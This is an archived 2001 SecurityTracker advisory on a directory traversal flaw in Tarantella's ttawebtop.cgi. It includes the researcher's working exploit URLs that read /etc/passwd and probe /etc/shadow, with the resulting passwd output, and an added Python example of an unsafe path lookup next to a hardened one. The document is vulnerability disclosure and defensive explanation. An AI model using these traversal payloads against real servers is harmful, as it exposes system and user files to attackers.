SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
Category:  Application (Web Server/CGI)  >  Tarantella
Vendors:  Tarantella, Inc.
Tarantella Application Web Server Discloses Files on the Server to Remote Users
Date:  Jun 19 2001 02:29 (UTC/GMT)
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Description:  A vulnerability has been reported in the Tarantella application server that lets remote users obtain files located anywhere on the server.

The vulnerability reportedly resides in the ttawebtop.cgi module.

If a remote user issues a URL of the following form, the server will return the world-readable password file:

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

If a remote user attempts to retrieve a file that is not readable by the web server, it will return a 'file missing' error message, as shown below:

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

File missing

The following file could not be found:

/tarantella/../../../../../../../../../../../../../../../etc/shadow

The vendor has reportedly been notified.
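As an added example (not code from the advisory or from Tarantella), the following Python contrasts a page lookup that joins the pg parameter onto the web tree unchecked, as the description above says ttawebtop.cgi does, with a canonicalise-and-confine version that refuses "../" traversal, URL-encoded traversal and absolute paths before touching the filesystem. The document root and page names are a constructed fixture.

```python
import os
import tempfile
from urllib.parse import unquote

# Constructed example of the behaviour the advisory describes: the
# user-controlled pg parameter is appended to the web tree with no
# canonicalisation, so "../" sequences walk out of it.
def resolve_page_unsafe(doc_root, pg):
    return os.path.join(doc_root, unquote(pg))

# Hardened lookup: canonicalise the joined path and require that it still
# lies inside doc_root. Refusal happens before any filesystem access, so a
# caller learns nothing about files outside the tree.
def resolve_page_safe(doc_root, pg):
    root = os.path.realpath(doc_root)
    candidate = os.path.realpath(os.path.join(root, unquote(pg)))
    # commonpath (not startswith) avoids the /var/www vs /var/www2 prefix trap
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate

def read_page(doc_root, pg, resolver):
    """Return the page body, or one generic error for every kind of refusal."""
    path = resolver(doc_root, pg)
    if path is None or not os.path.isfile(path):
        return "File missing"
    try:
        with open(path) as fh:
            return fh.read()
    except PermissionError:
        return "File missing"

def demo():
    """Constructed fixture: a throwaway doc root holding one page, probed
    with the advisory's pattern of fifteen '../' plus an encoded variant."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.html"), "w") as fh:
            fh.write("welcome")
        traversal = "../" * 15 + "etc/passwd"
        encoded = "%2e%2e%2f" * 15 + "etc/passwd"
        return {
            "legit": read_page(root, "index.html", resolve_page_safe),
            # the unchecked join collapses to the real /etc/passwd path
            "unsafe_resolves_to": os.path.normpath(resolve_page_unsafe(root, traversal)),
            "safe_refuses": resolve_page_safe(root, traversal),
            "safe_refuses_encoded": resolve_page_safe(root, encoded),
            "safe_refuses_absolute": resolve_page_safe(root, "/etc/passwd"),
        }
```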

Impact:  A remote user can obtain world-readable files located anywhere on the server.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.tarantella.com/
Cause:  Access control error, Input validation error
Underlying OS:  Linux (Caldera), Linux (Red Hat), Linux (SuSE), Linux (Turbo Linux), UNIX (AIX), UNIX (HP/UX), UNIX (SCO), UNIX (Solaris - SunOS), UNIX (Tru64)
Reported By:  KF <dotslash@snosoft.com>
Message History:   This archive entry has one or more follow-up message(s) listed below.
Jun 19 2001 (Vendor Has Fixed This Issue) Re: Tarantella Application Web Server Discloses Files on the Server to Remote Users   (Mike McEwen <mikemc@tarantella.com>)
The vendor announces that they have fixed the problem. The vendor reports on which versions were vulnerable.



 Source Message Contents

Date:  Mon, 18 Jun 2001 13:18:08 -0400
From:  KF <dotslash@snosoft.com>
Subject:  SCO Tarantella Remote file read via ttawebtop.cgi

 

SCO has been notified of this issue. 


-------- Original Message --------
Subject: SCO Tarantella Remote file read via ttawebtop.cgi
Date: Mon, 18 Jun 2001 13:06:41 -0400
From: KF <dotslash@snosoft.com>
To: recon@snosoft.com


http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/
...

No perms to shadow...

http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

File missing
The following file could not be found:
/tarantella/../../../../../../../../../../../../../../../etc/shadow
Please give this information to a Tarantella Administrator.

-KF



Copyright 2001, SecurityGlobal.net LLC